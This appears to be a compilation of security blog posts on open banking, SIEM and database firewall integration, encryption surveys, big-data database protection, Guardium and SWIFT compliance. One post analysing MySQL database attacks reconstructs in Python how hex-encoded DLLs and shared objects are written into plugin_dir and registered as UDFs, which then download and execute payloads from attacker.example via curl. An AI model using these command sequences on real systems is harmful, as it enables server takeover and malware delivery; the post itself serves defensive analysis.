This represents both a challenge and a tremendous opportunity for financial institutions and TPPs. On one hand, it makes the overall market more appealing to consumers and expands the services available to them to include a multitude of new players in the financial market. On the other hand, open banking significantly widens the threat surface and puts consumers and financial institutions at greater risk of attack.

New Standards Overlook Device Security

For this reason, the initiative comes with a new set of security standards. However, these mandates deal mostly with authentication, transaction monitoring and API security, and largely ignore the security of the devices from which transactions originate. This is problematic because compromising mobile devices is a popular activity among cybercriminals. By capturing large volumes of devices, threat actors can raise their profile and increase their ability to either attack devices directly or use them to launch distributed denial-of-service (DDoS) campaigns.

Since cybercriminals commonly target the source of a transaction, it is crucial for security teams in the financial industry to consider the consumer’s security first and use whatever threat intelligence they can gather to calculate the risk associated with a given transaction. This means that the risk level of a transaction should be calculated based not only on whether the user’s account is protected by strong authentication, but also whether malware is present on the device.
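One simple way to picture such a calculation is a score that weights device-health signals alongside authentication strength, as in the sketch below. The signals and weights are purely illustrative; real risk engines draw on far richer threat intelligence.

```python
# Illustrative transaction risk score combining auth and device signals.
def transaction_risk(strong_auth: bool, malware_detected: bool,
                     device_rooted: bool, new_payee: bool) -> int:
    """Return a 0-100 risk score for a payment transaction."""
    score = 0
    score += 0 if strong_auth else 25       # weak or single-factor authentication
    score += 40 if malware_detected else 0  # malware present on the device
    score += 20 if device_rooted else 0     # compromised device integrity
    score += 15 if new_payee else 0         # unusual transaction context
    return min(score, 100)

risk = transaction_risk(strong_auth=True, malware_detected=True,
                        device_rooted=False, new_payee=True)
if risk >= 50:
    print(f"Step-up verification required (risk={risk})")
```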

Open Banking and the Security Immune System

It’s important to note that opening the financial marketplace to third-party providers will drastically increase the attack surface. While it’s still critical to monitor individual transactions, financial institutions must focus on implementing security controls to reduce the risk of an attack. They can then integrate these tools and processes into a holistic security immune system designed to prevent, detect and respond to incidents.

Open banking also increases the criticality of cloud-based security controls. It is no longer a matter of whether an institution will adopt cloud solutions, but a question of who provides what services to whom. Cloud adoption is intrinsic to open banking, and having visibility into the cloud from a cybersecurity perspective is crucial.

Security teams must integrate these controls with processes that focus on detection to enable them to respond more effectively. By applying the security immune system approach to open banking, financial institutions can offer consumers greater flexibility and convenience — all while keeping their devices secure and their money safe from cybercriminals looking to exploit new security gaps.


Breaking Down the Security Immune System: Proactive Database Protection Through SIEM Integration

Protecting data requires strong integration of security controls. For example, a database firewall that analyzes data activity on a monitored system does not typically provide insight into what is going on in the rest of the infrastructure. The firewall simply governs who can access the database and from where data can be extracted based on a set of defined policies.

Organizations commonly employ this method to protect the enterprise’s crown jewels. These static rules work great until an unexpected event changes the context of the attributes used to define the rules. If a malicious actor gains access to a machine and account with legitimate access to the database, the firewall’s rules won’t change and the data will likely be exposed.

This problem applies to many other security controls that organizations depend upon to protect their most sensitive assets. How can security teams leverage insights gleaned from more dynamic tools to make their disparate solutions more effective? How can they integrate these tools into a seamless, holistic security immune system?

Using SIEM to Identify a Compromised Machine or User Account

At the heart of the security immune system is a strong security information and event management (SIEM) solution. This platform monitors the entire environment and provides visibility into a broad range of inputs, including database activity. By integrating the various tools that are present in a typical security environment with an SIEM, analysts can perform more dynamic analyses of threat data and identify potentially malicious activity that would otherwise fly under the radar.

Let’s say that a potentially compromised user account or machine is allowed access to the corporate database. Although the SIEM solution is configured to produce alerts about suspicious activity, the database firewall detects no anomalies. As a result, no action is taken until analysts manually trigger responses. In the meantime, threat actors have full access to the database.

However, in addition to detecting anomalous activity, an SIEM can help prevent data loss or modification. When integrated tightly with the firewall, it can trigger automated modification or create new firewall configurations. The SIEM can then translate its insights into dynamic attributes to define new protection rules for the firewall, thus minimizing the window of time during which attackers can compromise data.
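Conceptually, that loop looks something like the sketch below, in which a SIEM alert about a compromised host is translated into a dynamic deny rule on the database firewall. The interfaces are stand-ins, not any vendor's actual API.

```python
# Stand-in objects showing the SIEM-to-firewall automation loop.
class DatabaseFirewall:
    def __init__(self):
        self.blocked_sources = set()

    def block(self, source: str, reason: str) -> None:
        self.blocked_sources.add(source)
        print(f"Firewall rule added: deny {source} ({reason})")

    def allows(self, source: str) -> bool:
        return source not in self.blocked_sources

def on_siem_alert(alert: dict, firewall: DatabaseFirewall) -> None:
    # Translate a high-severity SIEM offense into a dynamic protection rule.
    if alert["category"] == "compromised-host" and alert["severity"] >= 7:
        firewall.block(alert["source_ip"], alert["category"])

fw = DatabaseFirewall()
on_siem_alert({"category": "compromised-host", "severity": 9,
               "source_ip": "10.0.4.17"}, fw)
assert not fw.allows("10.0.4.17")  # window of exposure closed automatically
```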

Sniffing Out Insider Threats With UBA and SIEM

Identifying insider threats within your organization is no easy task. While database firewalls can provide analytics on users accessing the monitored data, this constitutes a small subset of the overall user activity. However, user behavior analytics (UBA) can identify suspicious activity associated with a specific user based on a larger set of data. This tool uses machine learning to monitor users across multiple sources of information, assign risk scores based on their activity, and generate insights over short and long periods of time to spot potentially risky behavior.

By integrating UBA with the database firewall, you can use the insights generated by the UBA tool to update protection policies in the firewall and temporarily block a user’s access to sensitive information while analysts investigate his or her activities further.


Automation and Incident Response

With a proactive approach to risk mitigation, the response team must take immediate action, which could impede a legitimate user’s ability to perform his or her job. For this reason, proactive measures may not always be appropriate for mission-critical systems.

The biggest challenge is to determine when it is best to use automatic blocking. This technique should only be used when blocking access to a database would have minimal impact on business continuity or in response to particularly severe incidents. Obviously, a well-tuned SIEM and the proper business context are crucial in this scenario.

It is important to promptly escalate any indication of a data breach to an incident response platform. At that point, an analyst will immediately begin to investigate the situation, analyze the root cause, reconfigure the security controls accordingly and endeavor to resume standard operations as quickly as possible. In cases where automated blocking is not acceptable, analysts can still minimize the response time by first confirming the incident and then invoking appropriate action directly from the incident response platform.

Automation can save security analysts a lot of time when responding to incidents, and time is crucial when dealing with a potential data breach. Organizations that have comprehensive, well-defined incident response checklists and deploy a wide range of tightly integrated tools will be in the best position to spring into action when a data breach strikes.



How to Comply with GDPR

In a little over a month – on May 25, to be precise – the EU’s General Data Protection Regulation (GDPR) will take effect.


Survey: Nearly Half of Organizations Have a Consistent Enterprise Encryption Strategy

Nearly half of organizations have an enterprise encryption strategy that is applied consistently across the entire organization, a new encryption survey revealed. Forty-three percent of respondents to Thales’ “2018 Global Encryption Trends Study” said their employer had an enterprisewide encryption plan in place for 2017. That’s up from 41 percent in 2016 and 37 percent in 2015.

Enterprise Encryption Strategy Adoption on the Upswing

Thales began tracking the evolution of encryption back in 2005. In the 13 years that followed, the firm observed a steady increase in organizations adopting an encryption strategy. The company reported a decline in companies with no such strategy or plan over the same period: Just 13 percent of respondents said they lacked a comprehensive encryption policy in 2017, down from 15 percent two years prior.

Not all survey participants reported having a consistent plan across the entire organization, but the percentage of professionals with a limited enterprise encryption strategy didn’t change from 2016. Forty-four percent of respondents said their organization had a limited approach in both 2016 and 2017, which is up from just a quarter of individuals in 2015.

IT Security Spending on the Rise

For the study, Thales commissioned the Ponemon Institute to survey 5,252 individuals across industry sectors in the U.S., U.K. and 10 other countries. Their responses provided the company with insight into how enterprises’ use of encryption has evolved.

Their answers also illuminated how much budget employers are allocating to encryption and IT security. The former declined slightly from 14 percent in 2016 to 12 percent in 2017. At the same time, organizations spent approximately 10 percent of their overall IT spending on security, a percentage that marked a record high in a 13-year upward slope.

The report indicated some areas where both encryption and security spending could grow. One of them was cloud, with 21 percent of professionals expecting their organization to transfer sensitive or confidential data to the cloud within the next year or so. That’s in addition to the 61 percent of respondents who already do so.

Human Error an Ongoing Risk to Data

The Thales survey revealed that employee mistakes weighed heavily on respondents’ minds. Forty-seven percent of professionals cited human error as the most salient threat to sensitive or confidential data, followed by system or process malfunction and cybercriminals at 31 percent and 30 percent, respectively.

To protect against employee mistakes, organizations should balance technical controls with training that helps employees take responsibility for their actions.


How to Tune Your Database Security to Protect Big Data

As digital information continues to accumulate worldwide, big data solutions grow more and more popular. The introduction of IoT into our lifestyle, which turns appliances into smart data-logging machines, along with organizations tracking behaviors for data science and research purposes, has made the move into big data storage inevitable.

Non-relational databases provide volume, velocity, variety and veracity, making them the perfect solution for storing huge amounts of complex data without excessive computing power and high costs. Moreover, the wide selection of stable and trusted big data solutions makes them an accessible option for virtually everyone. This is all well and good, but when stored big data is sensitive or private it requires protection, and while big data solutions grow rapidly popular, public understanding of big data security is lagging, leaving tremendous amounts of data exposed.

When it comes to relational databases, which have been around since the ’70s, data security has long been a standard practice, with common protocols and solutions that cover almost every breach scenario. Big data should be no different, as it faces the same threats: external breaches, malicious insiders and compromised insiders. So how do we take the trusted, successful data security methods used on RDBMS and render them compatible with big data servers? How can we close the gap between the demand for big data servers and the lagging security measures used to protect them?

Discovery: taking control of data

One of the many advantages of big data is its ability to spread out on distributed environments, in order to maximize the available computing power and to allow data backup. The downside is that many organizations and companies can’t even tell which of their servers contain big data clusters.

As a first step, a discovery process should be performed to single out the servers that contain big data. The discovery process allows IT teams to find unknown databases by scanning the enterprise networks. Moreover, database discovery should be automated and configured to scan specific network segments on demand or at scheduled intervals.
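A bare-bones version of such a scan might look like the sketch below, which probes a network segment for ports commonly associated with database and big data services. The subnet and port map are examples only; scan nothing you are not authorized to scan.

```python
# Minimal database-discovery sweep over one network segment.
import socket
import ipaddress

DB_PORTS = {9083: "Hive metastore", 21050: "Impala", 27017: "MongoDB",
            9042: "Cassandra", 5432: "PostgreSQL"}

def discover(subnet: str, timeout: float = 0.3):
    """Yield (host, port, service) for every open database port found."""
    for host in ipaddress.ip_network(subnet).hosts():
        for port, service in DB_PORTS.items():
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                s.settimeout(timeout)
                if s.connect_ex((str(host), port)) == 0:
                    yield str(host), port, service

for host, port, service in discover("10.0.8.0/28"):  # example segment
    print(f"{host}:{port} looks like {service}")
```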

An additional aspect of the discovery process is to be aware of the services the organization uses to approach big data. Services such as Hive or Impala, which can read and write big data, function as a doorway to it, and as such should be protected against infiltration by malicious parties.

Classification: identifying sensitive data

The discovery process most likely left us with a map of huge amounts of data, but not all of it is sensitive and requires protection. In fact, attempting to monitor all of the information would lead to excessive costs and redundant effort. To avoid this, the next step is to classify which parts of the discovered information are sensitive and require protection.

The term sensitive information refers not only to trade secrets the organization wishes to keep to itself, but also to data that is defined as sensitive by regulations, such as medical information, financial information, personal identity details and more. In order to comply with these regulatory requirements, the organization must know which parts of its big data clusters are considered sensitive.

The data classification process tags data according to its type, sensitivity, and value to the organization if altered, stolen, or destroyed. Upon its completion, the organization understands the value of its data, whether the data is at risk, and which controls should be implemented in order to mitigate risks. Data classification also helps an organization to comply with relevant industry-specific regulatory mandates such as SOX, HIPAA, PCI DSS, and GDPR.
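In its simplest form, classification is pattern-driven tagging, as in the sketch below, which flags records matching a few regulated data types. The regular expressions are deliberately simplified; production classifiers combine many detection methods and context checks.

```python
# Simplified sensitivity tagging by regular-expression match.
import re

PATTERNS = {
    "credit_card": re.compile(r"\b(?:\d[ -]?){13,16}\b"),
    "us_ssn": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
    "email": re.compile(r"\b[\w.+-]+@[\w-]+\.[\w.]+\b"),
}

def classify(text: str) -> set:
    """Return the set of sensitivity tags detected in a piece of data."""
    return {tag for tag, pattern in PATTERNS.items() if pattern.search(text)}

print(classify("Contact jane@example.com, SSN 123-45-6789"))
# e.g. {'email', 'us_ssn'}
```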

Assessment: detecting database vulnerabilities and misconfigurations

Now that the organization knows where its sensitive information resides, it can assess its current security status. This process shows teams where the organization stands today in terms of utilizing the protection tools already available. Following a predefined checklist, teams verify which security items are in place and used correctly, which are unused, and which could be used better.

The assessment process is an automated test which is able to detect database vulnerabilities and misconfigurations such as default passwords and required version updates. To achieve maximum security results, this process should use pre-defined vulnerability tests, based on CIS and DISA STIG benchmarks that are updated regularly.
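
As a minimal sketch of one such check, the snippet below flags accounts that still accept vendor default credentials; the credential list is illustrative and the login routine is a placeholder to be wired to a real database driver:

```python
# Vendor default credentials to test for (illustrative).
DEFAULT_CREDENTIALS = [
    ("admin", "admin"),
    ("root", ""),        # empty root password
    ("scott", "tiger"),  # classic Oracle default
]

def try_login(host, user, password):
    # Placeholder: replace with a real connection attempt using your
    # database driver of choice.
    return False

def check_default_passwords(host):
    findings = []
    for user, password in DEFAULT_CREDENTIALS:
        if try_login(host, user, password):
            findings.append(f"{host}: account '{user}' accepts a default password")
    return findings

print(check_default_passwords("db01.internal.example"))  # [] with the stub above
```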

Once the assessment is complete, detailed reports need to be produced, including recommended remediation steps that will help the organization maximize data security using its available resources.

Monitoring: audits, alerts and reporting

Once the assessment process has been completed successfully, the organization knows that the data is secure for the time being. But how can it be protected from future breaches? How can this security status be maintained in the future?

This needs to be done by tightly monitoring the sensitive information in order to achieve three goals:

  • The first one is to have an audit trail, which logs all actions performed on the sensitive data and the people performing these actions. This will be useful for forensic investigation purposes, if a breach occurs, and will help to comply with regulatory policy.

The audit trail provides complete visibility into all database transactions, including local privileged user access and service accounts. It also continuously monitors and audits all logins/logouts, updates, privileged activities and more.

  • The second is alerts. Dynamic profiling can automatically build a whitelist of the data objects regularly accessed by individual database accounts. Admins can create policies that generate an alert when a profiled account attempts to access a data object that is not whitelisted (see the sketch after this list).
  • And last is reporting. All monitored data, including alerts, is logged and can be accessed at any time for reporting purposes.
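
Below is the sketch referenced above: a toy version of dynamic profiling and whitelist-based alerting. The account and object names are hypothetical, and real products build profiles from full audit streams rather than in-memory sets:

```python
from collections import defaultdict

# Profiling phase: learn which data objects each account normally touches.
profile = defaultdict(set)

def observe(account, table):
    profile[account].add(table)

# Enforcement phase: alert when an account strays outside its profile.
def check_access(account, table):
    if table not in profile[account]:
        print(f"ALERT: {account} accessed unprofiled object '{table}'")

# Build a baseline from historical audit records (values are invented)
for account, table in [("app_svc", "orders"), ("app_svc", "customers")]:
    observe(account, table)

check_access("app_svc", "orders")   # silent: within profile
check_access("app_svc", "payroll")  # triggers an alert
```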

Analytical insights: building behavioral patterns and detecting anomalies

Every piece of information logged and audited by the monitoring tools is gathered and saved. Once enough data has been accumulated, it needs to be processed in order to create individual and organizational behavioral patterns.

This process utilizes machine learning to automatically uncover unusual data activity, surfacing actual threats before they become breaches. How? It first establishes a baseline of typical user access to database tables and files, then detects, prioritizes, and alerts on abnormal behavior. Moreover, it gives the ability to analyze the data access behavior of particular users with a consolidated view of their database and file activity, investigate incidents and anomalies specific to the individual, view the baseline of typical user activity, and compare a given user with that user’s peer group.
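
A crude stand-in for this kind of baselining, using a simple standard-deviation test in place of the machine learning models real products employ, might look like this (the access counts are invented):

```python
import statistics

def is_anomalous(history, todays_count, threshold=3.0):
    """Flag today's access count if it deviates from the user's baseline
    by more than `threshold` standard deviations."""
    mean = statistics.mean(history)
    stdev = statistics.pstdev(history) or 1.0  # avoid division by zero
    return abs(todays_count - mean) / stdev > threshold

# Daily row counts read by one analyst over two weeks (invented)
history = [120, 95, 130, 110, 105, 98, 125, 140, 101, 117]
print(is_anomalous(history, 115))   # False: a normal day
print(is_anomalous(history, 9500))  # True: possible bulk exfiltration
```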

Once these patterns are established, the highest-risk users and assets need to be spotlighted so the data security team can prioritize the most serious data access incidents, investigate events by filtering open incidents by severity, and then take a deeper look into specific incident details about the user and the data that was accessed.

Achieving a successful security process, including the steps mentioned above, can be a daunting task when you are using insufficient tools and protocols. That is why Imperva developed SecureSphere, one unified security platform that monitors and protects all enterprise data, managed using a single pane of glass. The combination of SecureSphere, along with CounterBreach, Imperva’s behavioral analytics solution which detects risky data access behaviors, will provide you with maximized security for your big data.

Facilitating Stronger Data Protection and Partner Collaboration With Guardium 10.5

Many organizations struggle to manage unstructured data, and these challenges will only continue to grow. As we know, data volume is expected to increase tremendously over the next five to 10 years, and much of that growth will consist of unstructured data. It is crucial to understand this data in the context of security and privacy, especially given impending regulatory deadlines.

Beyond the security and compliance challenges that unstructured data poses, there is also the broader challenge of protecting both structured and unstructured data, wherever it resides and regardless of platform, in the face of the evolving threat landscape. It is well-known in the cybersecurity world that cybercriminals often work together in groups, collaborating to leverage their collective skills and amplify the impact they have.

Those of us who are dedicated to using our powers for good ought to do the same. Working together to improve our data protection capabilities is a good place to start.

Introducing IBM Security Guardium Data Protection v10.5

IBM Security Guardium is a suite of products designed to safeguard critical data wherever it resides. In an age when data growth is explosive and risks to personal and sensitive information lurk around every corner, having this capability across all environments and data sources is critical to business success.

Today, IBM announced the release of IBM Security Guardium Data Protection v10.5, which features new capabilities designed to help clients with the challenges outlined above.

Discovery and Classification for Unstructured Data Across More Platforms

As of v10.5, Guardium Data Protection for Files now supports discovery and classification for unstructured data across network-attached storage (NAS), SharePoint, Windows and Unix platforms. This allows clients to gain a more cohesive understanding of where their unstructured at-risk data lies and what type of data it is, which helps them support compliance with various regulatory mandates and establish a strong foundation for an effective enterprise data security program.

Expanded Partner Ecosystem for Data Security and Open Access for Integration

As part of this new release, Guardium is providing open data security integration points with applications developed by technology and business partners hosted in the new Guardium App Exchange. To help these partners build value-added data security applications that leverage or extend Guardium’s existing capabilities, Guardium now also provides a software development kit (SDK).

By facilitating collaboration to expand the data security ecosystem, IBM aims to make it easier for those with an interest in data security to work together to help protect sensitive data in new ways. This enables security teams to implement specialized technologies, niche data platforms and experimental interfaces to expand upon Guardium’s existing integration points and core capabilities while also improving usability for a wider range of people.

Get Started Today

There are many resources to help organizations get started with the new Guardium SDK and begin contributing to the App Exchange, most notably the DevCenter for high-level help and resources and the Knowledge Center for technical enablement. To download the SDK now, visit the App Exchange.

On May 17, we will be hosting a Tech Talk where you can learn about these capabilities and more. You can register here.

The post Facilitating Stronger Data Protection and Partner Collaboration With Guardium 10.5 appeared first on Security Intelligence.

Cybersecurity: How Do You Build a Transformational Dynamic?

At the end of a keynote speech I gave at the excellent CIO WaterCooler LIVE! Event in London on 28th September 2017 on security organization, governance and creating the dynamics

The post Cybersecurity: How Do You Build a Transformational Dynamic? appeared first on The Cyber Security Place.

Biometrics in the workplace: what about consent and legitimate interest?

How can organizations processing biometric data for workplace security or fraud prevention use cases ensure that they are compliant with requirements within the General Data Protection Regulation (GDPR)? This article

The post Biometrics in the workplace: what about consent and legitimate interest? appeared first on The Cyber Security Place.

Strengthening Cybersecurity’s Weakest Links With Deep Network Insights

Like a chain forged of steel, cybersecurity is only as strong as its weakest link. But how can we gain visibility into where these weaknesses exist and how they are being exploited? How can we determine where gaps occur that impact our ability to protect against, detect and respond to the latest threats?

Studies have shown the vast majority of cyberattacks take place using our networks — which isn’t surprising in our hyperconnected world. Comprehensive visibility into the activity on our networks can provide deep network insights into not only what is occurring across our organizations, but also where we are potentially exposed.

Identifying Weak Links in the Cybersecurity Chain

People are the weakest link in the proverbial cybersecurity chain. Social engineering can provide easy access to even our most sensitive assets. Let’s say, for example, a person with valuable information, access or authority is targeted by a spear-phishing attack. It could be someone in the IT department, one of your executives — or any employee who could be used as a stepping stone to gain further access or information.

Jose Bravo, North America security architect at IBM, recently published a video to demonstrate how a human resources manager might fall victim to such a scheme by merely opening the wrong attachment, clicking the wrong link, or (as the video shows) unblocking content and allowing a document to update links. Even with proper security training, it is often relatively easy for fraudsters to trick employees into taking these actions, especially when they resemble tasks they repeatedly perform throughout their day.

There are also less direct ways in which humans represent the weakest link in security. I have yet to find a cybersecurity team that is not short-staffed and overworked. All it takes is a simple mistake, such as misconfiguring a network device, leaving the wrong port open or failing to enable logging everywhere visibility is needed. Even if everything is set up correctly, a mundane change could have unintended consequences and leave networks exposed.

So, how can we gain visibility into areas where we may be exposed and times during which we are most susceptible to being exploited? Can we gain enough insight into these weak links to take proper corrective action?

Unlocking the Power of Deep Network Insights

This is where the power of deep network insights can help. Basic network flow analysis can detect a new device connecting to the network, even if it doesn’t log any activity. In addition to detecting these devices, the right security information and event management (SIEM) solution can automatically add them to the list of known assets so that they can benefit from the same security analytics as properly configured devices.
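
As a rough illustration of the idea, the toy monitor below learns known assets from flow records and flags any source address it has not seen before; the IP addresses are hypothetical:

```python
# Learn the set of known assets from flow records and flag newcomers.
known_assets = set()

def process_flow(src_ip, dst_ip, dst_port):
    if src_ip not in known_assets:
        print(f"New device: {src_ip} (first seen talking to {dst_ip}:{dst_port})")
        known_assets.add(src_ip)  # auto-add so it benefits from future analytics

process_flow("10.0.2.7", "10.0.0.5", 443)  # alert: first appearance
process_flow("10.0.2.7", "10.0.0.9", 53)   # silent: already a known asset
```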

But deep network insights enable security teams to go well beyond simply detecting devices and their communications. When malicious actors try to disguise their activity by misusing standard ports and protocols, deep analysis of the real applications allows security professionals to shed light on the true nature of what is occurring. If sensitive data is subsequently accessed, application-specific content analysis can provide the proper visibility to quickly identify and protect the valuable data our organizations rely on every day.

In this way, the very networks that expose our weaknesses to adversaries also provide us with the visibility we need to properly defend our sensitive data. The key is simply to look deep enough.

The post Strengthening Cybersecurity’s Weakest Links With Deep Network Insights appeared first on Security Intelligence.

Nearly Half of Organizations Targeted Again Within a Year of Suffering a ‘Significant’ Cyberattack, Report Reveals

Nearly half of organizations that suffered a “significant” digital attack fell victim to bad actors again within a year’s time, a new security trends report revealed.

According to Mandiant’s “M-Trends 2018” report, 49 percent of managed detection and response customers that remediated a large-scale attack suffered an incident from the same or a similarly motivated threat group within one year. The initial assaults consisted of data theft, credential harvesting and spear phishing, among other techniques.

Unpacking Repeat Cyberattack Trends

Mandiant admitted to not having looked at recompromise figures since it released its “M-Trends 2013” study five years ago. That report found that 38 percent of clients had suffered another attack after successful remediation.

The number of follow-up attacks was somewhat higher in 2017: 56 percent of customers weathered at least one significant attack from the same threat group or one like it. At the same time, the vast majority (86 percent) of organizations that remediated more than one significant cyberattack hosted more than one unique bad actor in their IT environment.

Some regional differences were apparent over the course of the year. Less than half of customers in the Americas and Europe, Middle East and Africa (EMEA) experienced another attack of consequence and/or multiple threat actors. By contrast, 91 percent of Asia-Pacific (APAC) clients dealt with a subsequent campaign, while 82 percent of organizations from that region suffered a significant attack from multiple groups.

The Good News and Bad News About Dwell Time

Dwell time, or the average number of days during which attackers lurked in a victim’s network prior to detection, increased across several regions in 2017, according to the report. The APAC average increased nearly three times, from 172 days to 489 days. The EMEA dwell time growth was more modest at 40 percent, from 106 days to 175 days.

Stuart McKenzie, vice president of Mandiant at FireEye, expressed disappointment in the growth of the median EMEA dwell time but noted that it’s not all bad news.

“On the positive side, we’ve seen a growing number of historic threats uncovered this year that have been active for several hundred days,” McKenzie said, as quoted by Infosecurity Magazine. “Detecting these long-lasting attacks is obviously a positive development, but it increases the dwell time statistic.”

During the same survey period, the dwell time for the Americas decreased from 99 days to 75.5 days. The average across all regions rose slightly from 99 days to 101 days.

Looking Ahead

In the report, Mandiant shared its prediction that foreign digital espionage groups will continue to prey upon U.S. companies and service providers in 2018. It also predicted that bad actors will target the software supply chain to spy on developers and software-makers over the course of the year.

The post Nearly Half of Organizations Targeted Again Within a Year of Suffering a ‘Significant’ Cyberattack, Report Reveals appeared first on Security Intelligence.

Encryption an increasingly popular solution among organisations

Saves against human error, data theft or compliance issues. Organisations are turning towards encryption to keep their data safe, new reports from Thales are saying. The critical information systems company issued

The post Encryption an increasingly popular solution among organisations appeared first on The Cyber Security Place.

A Deep Dive into Database Attacks [Part IV]: Delivery and Execution of Malicious Executables through SQL Commands (MySQL)

In a previous post we covered different techniques for executing SQL and OS commands through Microsoft SQL Server that can be used for delivering and executing malicious payloads on the target system. In this post, we'll discuss the same topic for the MySQL database.

Creating an executable directly on MySQL server via SQL commands

In one of the previous posts (Part I) we mentioned that hex-encoded queries are often used against databases to create a payload on a target system through SQL commands: a payload is converted from hexadecimal format back to a binary executable, and then gets executed by exploiting different database and operating system features through SQL commands.

We observed the following methods to create and execute executables on MySQL servers’ filesystem:

Method 1 – via SQL execution

The following example demonstrates a method to create and execute a dynamic-link library (DLL) or a Linux shared object (SO) on a MySQL server – without having direct access permissions to disk:

This attack (which is not new) loads a DLL (converted to a hex string) into a newly created table, yongger2 ("yongger" translates from Chinese as "brave"). The attack then uses the SELECT … INTO DUMPFILE command to extract the DLL from the new table into the file cna12.dll in the MySQL plugin directory. This method works if the plugin directory (the directory named by the plugin_dir system variable) is writable.

Once the DLL is created, MySQL server’s main process (mysqld) is notified about a new xpdl3() function using the CREATE FUNCTION command. This function is a downloader for another executable. It downloads the executable 123.exe through an HTTP request from a remote server (located in China). Then 123.exe is saved as c:\isetup.exe on a target filesystem, executed and then removed from the disk.
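
A condensed reconstruction of this command sequence is sketched below, assuming the mysql-connector-python driver. The table, file and function names follow the description above, while the connection details, plugin path, truncated hex payload and the exact xpdl3() argument list are placeholders:

```python
import mysql.connector  # assumption: mysql-connector-python is installed

conn = mysql.connector.connect(host="victim", user="root", password="...")
cur = conn.cursor()

# Stage the DLL as a hex literal inside a scratch table
cur.execute("CREATE TABLE yongger2 (data LONGBLOB)")
cur.execute("INSERT INTO yongger2 VALUES (0x4D5A90)")  # hex payload truncated

# Write the blob into plugin_dir; works only if that directory is writable
cur.execute("SELECT data INTO DUMPFILE 'C:/mysql/lib/plugin/cna12.dll' "
            "FROM yongger2")

# Register the DLL's downloader function with mysqld, then invoke it
cur.execute("CREATE FUNCTION xpdl3 RETURNS STRING SONAME 'cna12.dll'")
cur.execute("SELECT xpdl3('http://attacker.example/123.exe', 'c:/isetup.exe')")
```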

The following figure summarizes this attack method:

Figure 1: Technique to create DLL and execute its function using SQL commands

Method 2 – via operating system execution

The following example demonstrates a method of writing a binary shared object (SO) directly to the MySQL plugin_dir on the filesystem:

The attack steps are as follows:

  • The hex-encoded shared object is decoded by the UNHEX function into binary format and then dumped into a file
  • The global log_bin_trust_function_creators system variable is set to 1 to relax the usual conditions on function creation (normally the creator must have the SUPER privilege, and the function must be declared deterministic or as not modifying data)
  • The sys_eval user-defined function (UDF) is created from the shared object (SO)
  • The sys_eval function is called and instructed to download an executable from the attacker's server (using cURL[1]), change the executable's permissions to full access (chmod 777) and execute it (a sketch of these steps follows the list)
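
The sketch referenced above reconstructs these four steps under the same assumptions as the previous one; the hex blob, paths and server details are placeholders:

```python
import mysql.connector  # same assumptions as the previous sketch

conn = mysql.connector.connect(host="victim", user="root", password="...")
cur = conn.cursor()

# 1. Decode the hex-encoded shared object and dump it into plugin_dir
cur.execute("SELECT UNHEX('7F454C46...') "  # ELF image, truncated here
            "INTO DUMPFILE '/usr/lib/mysql/plugin/udf.so'")
# 2. Relax the restrictions on function creation
cur.execute("SET GLOBAL log_bin_trust_function_creators = 1")
# 3. Register the UDF exported by the shared object
cur.execute("CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so'")
# 4. Download the payload, make it executable and run it
cur.execute("SELECT sys_eval('curl -o /tmp/x http://attacker.example/x; "
            "chmod 777 /tmp/x; /tmp/x')")
```
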
Figure 2: Technique to create Shared Object on Linux OS and execute its function using SQL commands

Downloading executables to a MySQL server via SQL commands

In MySQL, the user-defined function (UDF) remains one of the few methods available for running commands on the server through the database. It is supported as a function loaded from an external library, such as a DLL or Linux shared object. We'll describe the method in detail in the next blog in the series.

After an attacker uploads or creates an external library on the server's filesystem, they can execute its functions. From there, the attacker abuses UDF functions to download malicious executables from a remote server.

Examples of this technique follow the same pattern as the sys_eval call sketched above.

Summary

In this post we covered various methods for executing SQL and OS commands through a MySQL database, which can be used to deliver and execute malicious payloads on a targeted system. In the next post in this series, we'll describe techniques attackers use to perform external and internal reconnaissance and to increase the attack surface.

[1] cURL is a computer software project providing a library and command-line tool for transferring data using various protocols.

Streamline Compliance with SWIFT Customer Security Program Requirements

Transferring money from our bank accounts has never been easier than it is today. With a single click on our smartphones, we can transfer money from a bank account in New York to an account at a different bank in the Netherlands.

This advancement is largely a result of the fluent communication between banks around the world, facilitated by SWIFT, the Society for Worldwide Interbank Financial Telecommunication.

Founded in 1973, SWIFT is an organization that provides banks and financial institutions worldwide with a communications network allowing them to execute financial transactions in a secure and standardized manner. Over time, SWIFT has become synonymous with financial communications, so much so that the majority of the world's financial institutions use it.

Technological progress aside, being the sole guardian of most of the world’s money as it’s transferred between institutions is a position that comes with great risk. As such, SWIFT has become a magnet for white-collar scams and hackers preying on the biggest money highway in the world. The past two years alone have seen at least three successful attacks on SWIFT servers, while unsuccessful ones are carried out daily by hackers around the world.

In 2016, using SWIFT credentials, hackers were able to steal $81 million by sending a dozen transfer requests to the Federal Reserve Bank of New York, asking to transfer millions of dollars out of the Bank of Bangladesh’s funds and into different accounts in the Far East.

In November 2017, hackers attacked the SWIFT servers of a Nepalese bank, stealing a total of $4.4 million and moving it to the US, UK and Japan using fraudulent SWIFT messages. Only a month later, hackers attempted to steal 55 million rubles from the Russian state bank Globex using the same method; they were largely stopped and only managed to steal about $100,000.

The influx of hacking attacks on SWIFT didn't happen in a vacuum. It is a direct result of the technological advances hackers have made and the growing sophistication of their methods. And when it comes to SWIFT, which handles trillions of dollars daily, hackers go out of their way to succeed.

Following these latest attacks, SWIFT called on its more than 11,000 linked financial institutions to implement a Customer Security Program (SWIFT CSP) by December 31, 2018. The program contains a number of mandatory protection methods, which all SWIFT organizations must enforce by the deadline.

Lowering Risk, Increasing Security

To meet the aggressive deadline and effectively implement a SWIFT CSP compliance program, many organizations are turning to third-party security solutions that can assist with and automate monitoring and protection of vulnerable systems. Below is a list of SWIFT CSP requirements and some examples of how third-party solutions can help protect databases and data flows.

SWIFT Environment Protection

SWIFT requires all members to ensure the protection of the user’s local SWIFT infrastructure from potentially compromised elements that originate in the general IT environment or external environment surrounding the SWIFT server.

For database infrastructure, a robust database firewall can meet this requirement by functioning as a buffer between the SWIFT system and connected database components, preventing unauthorized access to relevant data records.

Internal Dataflow Security

This requirement is meant to guarantee the confidentiality, integrity, and authenticity of data flows between the local SWIFT-related applications and their link to the operator PC.

One way this requirement could be met is to deploy a web application firewall (WAF) to secure the connection between the user’s PC and the local SWIFT application (if web-based) to block unauthorized access.

Security Updates

